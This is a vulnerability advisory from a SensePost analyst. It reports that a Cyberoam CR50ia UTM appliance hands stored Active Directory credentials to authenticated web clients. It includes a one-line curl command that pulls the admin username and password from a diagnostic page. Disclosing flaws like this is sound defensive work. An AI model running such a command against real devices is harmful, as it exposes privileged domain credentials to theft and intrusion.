SECURITY ADVISORY: cyberoam-utm-insecure-password-handling Affected Software: Cyberoam CR50ia 10.01.0 build 678 Vulnerability: Insecure Password Handling Severity: High Release Date: Unreleased I. Background ~~~~~~~~~~~~~ "Cyberoam Unified Threat Management appliances offer assured security, connectivity and productivity to Small Office-Home Office (SOHO) and Remote Office-Branch Office (ROBO) users by allowing user identity-based policy controls." Cyberoam UTM integrates with Active Directory. In order to query data from a configured AD, domain credentials are stored within the device. These credentials are retrievable by an authenticated user. II. Description ~~~~~~~~~~~~~~~ Domain credentials are stored on the device and passed to web clientson a diagnostic page (Identity --> Authentication --> Authentication Server --> /Select Configured AD/ ). Authenticated clients can thus easily access stored credentials. A trivial check for this follows (replace cookie value): curl -s -b "JSESSIONID=u2ur76lhy4qt" -H "Referer: blah" "http:///corporate/webpages/identity/ActiveDirectoryEdit.jsp?__RequestType=ajax&&objectID=1&pageid=pagePopupForm1"|egrep '(adminusername|passwdvalue)' III. Impact ~~~~~~~~~~~ The vulnerability allows a malicious user to access potentially privileged domain credentials. Should default passwords not be changed, then this is a trivial entry point onto a Windows domain. IV. Remediation ~~~~~~~~~~~~~~~ Do not return stored credentials to the browser. V. Disclosure ~~~~~~~~~~~~~ Reported By: Saurabh Harit, Senior Security Analyst, SensePost Discovery Date: 2011-11-01 VI. References ~~~~~~~~~~~~~ [1] http://www.cyberoamworks.com/Cyberoam-CR50ia.asp Thanks & Regards, ------------------------------------------------------- Saurabh Harit Senior Security Analyst SensePost Pvt Ltd Phone: +27 768006821